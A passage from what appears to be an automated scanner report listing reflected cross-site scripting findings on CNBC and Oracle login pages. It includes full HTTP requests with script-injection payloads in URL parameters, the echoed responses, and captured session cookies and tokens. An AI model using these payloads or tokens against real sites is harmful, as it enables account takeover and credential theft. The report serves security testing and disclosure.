<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check9b9cd"><script>alert(1)</script>792007f2f0&login_view=register">
...[SNIP]...

3.44. https://login.cnbc.com/cas/login [login_view parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The value of the login_view request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f224b"><script>alert(1)</script>829e8aaba58 was submitted in the login_view parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=registerf224b"><script>alert(1)</script>829e8aaba58 HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:11 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88659


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=registerf224b"><script>alert(1)</script>829e8aaba58">
...[SNIP]...

3.45. https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 55fd4'><script>alert(1)</script>bb9117bee86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register&55fd4'><script>alert(1)</script>bb9117bee86=1 HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88638


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<iframe name="regFrame" frameborder="0" class="registerFrame" style='height:800px;' scrolling="no" src='https://register.cnbc.com/registerUser.do?iframe=yes&source=register&55fd4'><script>alert(1)</script>bb9117bee86=1'>
...[SNIP]...

3.46. https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67364"><script>alert(1)</script>6e7c0304749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register&67364"><script>alert(1)</script>6e7c0304749=1 HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:35 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88638


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register&67364"><script>alert(1)</script>6e7c0304749=1">
...[SNIP]...

3.47. https://login.cnbc.com/cas/login [service parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The value of the service request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload beaf8"><script>alert(1)</script>27bcb15f035 was submitted in the service parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_checkbeaf8"><script>alert(1)</script>27bcb15f035&login_view=register HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:09 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88589


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_checkbeaf8"><script>alert(1)</script>27bcb15f035&login_view=register">
...[SNIP]...

3.48. https://login.cnbc.com/cas/login [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34868"><script>alert(1)</script>3f8471aa8dc was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header34868"><script>alert(1)</script>3f8471aa8dc&login_view=header HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; TZM=-300; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:32 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 5727
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header34868"><script>alert(1)</script>3f8471aa8dc&login_view=header">
...[SNIP]...

3.49. https://login.cnbc.com/cas/login [source_type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The value of the source_type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb331"><script>alert(1)</script>a8ddc251ca7 was submitted in the source_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=procb331"><script>alert(1)</script>a8ddc251ca7&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=subscription HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
Referer: http://pro.cnbc.com/index.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:54 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 7137
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<form method="post" name="loginForm" action="login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=procb331"><script>alert(1)</script>a8ddc251ca7&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=subscription">
...[SNIP]...

3.50. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /oam/server/sso/auth_cred_submit

Issue detail

The value of the request_id request parameter is copied into the HTML document as plain text between tags. The payload c1951<script>alert(1)</script>81611ea9517 was submitted in the request_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oam/server/sso/auth_cred_submit?v=v1.4&request_id=-11174233175931698103c7b4%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ed6751adef14af5029c1951<script>alert(1)</script>81611ea9517 HTTP/1.1
Host: login.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: p_org_id=1001; p_lang=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315342940933; gpv_p24=no%20value; gpw_e24=no%20value; OAM_REQ=VERSION_4~NxywdvpcawCyMkTM4G71qJsOq72hZVWrUNC3MjhZV9f3dtJf5aL3%2flDPZgqxy71LbJwEeSlEW%2bymPmYi5xnQd1VhYNUy5BAaQuWYV1QPtKgkHgViQXuu26%2fj9P%2bw7wamSRLoSY38UWPAZZDVHEosIjfK91K4L24lW4XlijkOrHkWMnkThMoCKL%2bm%2fkypFHNQZbPrecqEbxIQ%2fmL1U5EjmghHZqmMKsGwfiolkoWQOZxYTitVababmv1AA2pygpRMHDHB3W0UuNa9IPK%2bWkEj7AzlwgJ%2fsOwSy6GgL4C6l6NBQqxbGALlu6wLGhs5CKMzrVnQuA9NYhkBoYNMq%2bCeiIvgzIykEQVBwnmmKyvVvDqW8dGr%2fTLu5ygIeagS0vuoz7CbOcyEcz27f8vx5%2fqclvJSD7mbtCvuMPbprZKgdGRSci3Z0qQF4Jkyj7YVT2LV008x7AIUy3QkD0rVEoH2xVeMEOUn7VAou3g28%2b%2bOUB3OZroMTKz273KYFOQk3bQBOTUoFLCR%2bQyOlwxMhhIJ46nIPIAn%2fcQ5NZtupalbBJ7rQNdrYpyvQGz%2bdftIr%2ff31bi1Diah8geTQiyN4%2fZ3KcMqlP9TnOuY5hEGmm4wObcg5WglrQVYV7isRF6AWRkd%2bk1kEROGepai8RjtcAegR%2b5Z%2bvUec4r7a%2b75gZc48dgS%2faR8ruh9CTlAwpKcFob2kF%2bHchzeWKHKjkNcAWhSbGFjrK4swdSEankx6biqm5UVJCpSmc%2fAq%2f1fgZR9sjRHHVSxrgB8EnObY98hf1BCukBz8mQps1PektbRn%2fALeHk%2fS9pVnjKwJFaXsNxsZt7TeEYc%2b71Dnk%2fz8YCzpWeR%2f%2bPl8unuOYUH1q44XoUMeLi1%2bADiVqRneB63%2ftWzOWBp50u1N%2bTy1Kxey3dC%2fdoECGY5XNp5zCsHkUZul5sxXdCUW8lNpPzmarHhun73cOKwJBV7ogKTADKqN7ertSGyqCCjzSMI40kgozmLHU2oD9JDPg28mWXowW1qliMYnh%2ffjkD6OqiHp3Y%2fzNYwnBP7Zh%2buj2%2fyGD%2fPaFWIi6cQrOgRdNlcb0Xc%2fl97NrLc8abdD%2f2un8kDJBUiE8023fM0yFwVHx6uFPqFC%2b%2fngCymDqp1UfTNFD5jCD6p7puTqmmLhUDn6xfgKkZhyCMLrpj26EuwcS7RSm7%2fS%2bkrjH5E3lHwAy7ss%2f4F2fNwASHfwHnFJSGkvYhLj3AL5tPNeNBKhhv%2bn4YDvdI65VI%2f985I9wzT5mDJ1xu6Z4lWDWiA5b8LGOn1dLaUvEN64D5Z53%2bY53LwfiQwVsaYFhOkJuG8Xp1nQWOuaPahq6jJTJgjFzJwBnE%2fGjHnoymO2FRpu48mOQooisWYBNUBz8Z8XWYk59Pmpr2QbX2lyJwghsEhfdMEBFfE4FIJ0sX93gHzRH9UUOwvWTsKqVZu82K6yOUAOUr7etnP4vYyxqUss0NXMcoXF7HQftpSaRbwpUtZ1B8F3feEjs9tBu45afXQ%2f%2fSOWltFnIIGzJzbE%2fvCkj9em8VBWnmiD%2bV3rKjz97EImPLbVavhHui4v98zrLQqvLqqytf%2fVCeOVu1MWD3zkUoC%2boXnBk%2bQw92SwOYQPwwouiBG%2b28Wl1QaypOncFf99oGzCgdaVMoKy7I1ClMk7jlTETTOWm09pk1afrjvV4tOZQ%2bz59ytqFim1FRiwWoC6yqRWJo%3d; 
BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:18:57 GMT
Set-Cookie: OAM_REQ=VERSION_4~EsY9351n%2bL75TyUMNl8LPW73mzYZPslZUdvAtbyf8I%2fsrrJG5gzSLEfs2wZO0aEEm%2f3JWzNmG5jKe1aJAnCDP45JBWjpLTnQMtc34bOV7V2iNl%2bMrXJxYSb8XBcWr%2foOxZLH36duZJi1Fm4481Kymq8RinvKKwEhGJLJOFo2%2fB0wEjM60VcUlsN%2fKUtXh4CgEjVg7oZzDAHzJEz0lBT0G0mYFIZUWbAwWFsi8vdddXkh3cGZotSc7eeh%2boqhYbRAAiGh1v7c4RTA%2fxqbZqQ9pHeY3qYge8IjHXdqcNQnfDNGI0eFb4QBv1JTF2%2fKIjJfwvgdn6nr1SICR86ih13Yu1t2KpaAAYmeonATsz0XlE%2bU6kXqcKnt0dInUlPhrsLbWee5NP9%2f19mt6gV9zPvaM7hDwtQuWCcNU4htv8gXHjTQBxsA%2b2SvZtvr0kIZkXlmkGg%2fb%2foAVB9D0pFXD6Ggh9cdooUvzY4viPGsxAfoI%2f591d7glZBOLkgUvS48uK6RRu8NbzYWHtpXaa%2bYmBTshVsE13YQpK4ObNWjS72Y5vFAmdYi7HisthZdJD%2bHKoa%2bOdwh7tD%2fYIf3aJj78SR9ufKcbtbzLYE6SRCixeTUyhCUnGsbtdI31KyQLmKtrx2kgJDwqmaIim5jLj099PmJF0gU0RYjYzuUbYwR45faQYsxxEoQ7mnGRwfyy5s4fmWlSX9cHmRyX8MW2EPSMraeHUpS33ko2QOwyIrkrEHFOjXrYfd%2b2yVFLS9IXJUiBwGSoRAF1LeDE2dHSjlLkLsSWTwm7oTRF98APeVSfu2R1J4uop1cWyJRFoJExHTDPjtafiU719gvppS0djK92osAheYsmsO4A9K3cLOBuVRPQJluOSLGsSFMpr%2fbqQYp6y8T0dAMi3Ds%2f9%2foCumvkBAgtzYNYsKhiKGbLTi0rzOD4e0jK0hoVDZrNvRpgKBl%2fvq0kUxndQ5un4EUFmbJp%2fE%2b%2bnjaGwCuXkMTK%2buWsVLQyiaxJS4EiCg42C4vv1PHJL1C9jHFtkkgU1fdTb6Yx6Wj2uU%2fByUOD94IPUfC%2bNe0cX%2fHcutt3ZxhT%2bkDMxUxcjIDBZv%2bjbISVrlcqGQ4ntNi2PSo9U2Gqrt1AeNkQ3K%2bzddfzhCG1M6bw8RoPiwzmjq6cLwQnbDKRHZqcJjGfW6FmionsHL4QaXJXEnlW88m9xVGQSZ8pIn1nBQJU26i68WyubXHx7jGY2yvR2Ru5kgn8PI0iaAsSWrmDsmvWI5v6Kf4i7P5Nm8CFY9TxPTz849yBwTijE5fAsm7L4F8CLSmt89c98WJd6N%2bEFyMapg9wfYYko62Zd7HhEbEhmauhmH7HnDCWwkjxJy%2fKRi2RxzUptRMTQ%2bgSnCV5RACLDybfDacI5duyXUFjDqxPyka7YQMifwTXMqc3I7yEM18nPI3Y3g6Pn4vS9bIKfmfbkDjkPf1Lu%2fz%2bNBXWNYccZhpG%2bndCyVP9CMRwLXGXxi85ZQvMKNEb8UzlaokmVmoMOXLkDYZyao7nbTJz7HzACTg%2bJOPN6ODWcwIr%2bbaGqTdMQQqLBa1KUkkVHx33BbHmyWSx6md0HukHmNASFcrFOuUkzd1RgurnTT7F%2bWo7huPmYTZ5pkYL%2fxHh5nXWaUsT%2f%2bHJ3LgdFdRvSgHzSSKQXl2K5HA%2bafmHtpxAgjYIr%2f12UctTk8YSf1XNIlrJjw3oLycqG3pChKZPr1DE%2bJjgVSTtL8VOC5tisuN5sEc%2fl3lM1yEGpm4LlDAWVY0D4v03%2brC9QMFtOF2qj%2bg0QZ2QxGggBLrs9B%2bf5L2cszHFtNSmEPvb0x6UIkFqgSfaz3bAKqM6VzRhBOrRC9lTl6C1unvfpSlrjT5Atd7Wplo72DP7htU9fVHm50C9vn8vTujqBCpXdmpzbEbwHbDMvwGy5GJOgva64ea0ayQeOm1Rr1jzwXX9BMO8dpefvXa5fo6IpgF%2bDE5jAf5JfBDwNyAFF51SwB5L6xBQndB1cLNqYJqdOBQUg%3d%3d; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000J8zYGTK6uHK6EVADUS1EHWFB01tbde
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:18:57 GMT; path=/
Content-Length: 2709

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...
</script>d6751adef14af5029c1951<script>alert(1)</script>81611ea9517">
...[SNIP]...

3.51. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /oam/server/sso/auth_cred_submit

Issue detail

The value of the request_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c7b4"><script>alert(1)</script>d6751adef14af5029 was submitted in the request_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and to deliver.

Request

GET /oam/server/sso/auth_cred_submit?v=v1.4&request_id=-11174233175931698103c7b4"><script>alert(1)</script>d6751adef14af5029&OAM_REQ=VERSION_4%7EJ%252bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%252bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQww8kKlGYXjlBF8phTLPz7FI%252bA5qofyVKAyO62Bauuu8qVF1ScS09pAcprUPivm3VFJ3H5Kgz%252flJzu7m9%252f1lXhQDZkvLYt%252bMMnr4kZSTqEAn9vkNTKCbSHhBs0EUMI62DsRPc2MSDv4g1v0UwyMn3mebBESr8TTmvRhios3MzyBQhvf4I8rM%252fwXpbFtlj2kGJ%252fPqDr5kNPmwYSFtqmYYyGN4nDSX09LufeZZN3FlT9ZvAMl4iCN9nhBlvG%252f%252fTaJw60iM1r1bkP3UdKVDfmpD8NuXDMqMi4EmV59%252fDEO%252fCYluZce8U%252bGGbT0K9o1sJA4XjxLL8%252f8AfNO%252fwgLKh%252bDofILOF3mRDkIRf68MKMzc7HUeCDu5YQ%252f1ao%252btvjJSu1MtNbwWjD8UmI6Bp%252bTRkGCB7OF6jAdOMmIOVBu7THJ6KSU4L2SAbPlMUQlqLLsH%252fcJMIXtw%252fqvMnBDKHrGSfc6r0RkyylnyMFuScSmd2qNULSeekz8BY7KTly4hiDnDSMlMYTLsixuo8%252b9NDEIshLoOT5kTmeXiCg0FTyr8YewQcLMAvb%252bbfWK8%252f54EneCznHCw32Dn13%252f%252b2dACr4TQeKM9Oua%252f%252bwnu%252bOKIUvCRMS7vWgTjRO5gee3ULhUyKtCENay%252bEYtLfegFYrD2T0tDzB1GcqWTZNEakL6GXMmgGKiTmFoSSXp8dcSso8oEAuAiYBSqM5GloP4Tob3Eft%252fPItNWUsY%252bqbZrilhUtsGtHuzBCTxKPfedNGX1FZuFxXwXbxwkdlHTEmzyTEyl%252fk2aJmyp8Ow%252fyV0o9SYR315eigxpsxzO3ZMFEmBad28OBM9tv5Pvi9O7Ri7Q%252bEXUOC%252f6G2f3htenFJenmnMekNtGu%252fXfaFZL8GjhhVe5W2JhMe%252bJLRaBu8X6ZoE54ocXwfJwUo5hV8m0jaq6DZYEXyrG149pUJzc6I26AH9jHtgcxBbozuQyyY7iwuNWhOqKPudiCfywcM6XktYPrp2zFS3bTkcQ8Rm6HRrZb%252fvB%252bACTy9lrXfSV77QwN%252buu6srum69cLBP5lmPul32t8OVdMpNiivhpmtV7Dbbe5zn%252bkIHj0PhVUbDcErrcfZVnIYDRRjINSbq089YfH3YmFdPktBdvcIhNNztLg2Tbbvh%252fD4y50BLNBJCH%252b8a6B8NLIOqiOoU%252fCEYSRHDnFZv5HTMnTiqJZ%252bljcmdaGu3BPZkHEknjwJ%252frdJN%252fF4KZDIxyB3z0Gc63SxU5%252bTOVa2gKg9LLQNB2%252bsQr1foYzGQLqnMUwF00FaWT2AYkTr5c%252fdnUfUIBSwOj5Q05wkiqOMB51WrBiy3GxzQhmyIU1H7mWj7BSJ%252f010hrRBg%252bfmeiP3OsSN7fXl67GS9KXjTcmXcpDpxRcQH8ZtVHtHmu8ImroMw8P6EovYOrU6HMbmDgwrjXvJbIlFOtbYI56UcoWsOz8MB99rzf65Ik4OZR0TJ7aAd2xC8u19T21z0udibFuvVGvxJuHLh%252f5w%253d%253d&site2pstoretoken=v1.2%7E15AB5291%7ECA7268AF16FDDCD6192ED08700B7C3B3CA2E1B23878BCD93247A950FAAA266F9D7A7C11B2586EEC1681E7C0613B1F158706D3CA7C179F2B6A77573D5C53030D02597238CD1C3E0212AE912A5703E640DF935186B51AB3DFAEEE7B2A7E20FF4542015DBB0457891C5A4461CB4B4A23EB51909CE24B245C0A7CB1A8EBE5AC1C84D4342665B366BF177D22BAC7C46B7421C202F9871EF6C385B9C84ABA7DAB0DE4470E2A9204FA9C682&locale=&ssousername=xss&password=xss HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_nr=1315343778351; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Fentry%2Fbea_welcome_and_oracles_middle; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA; 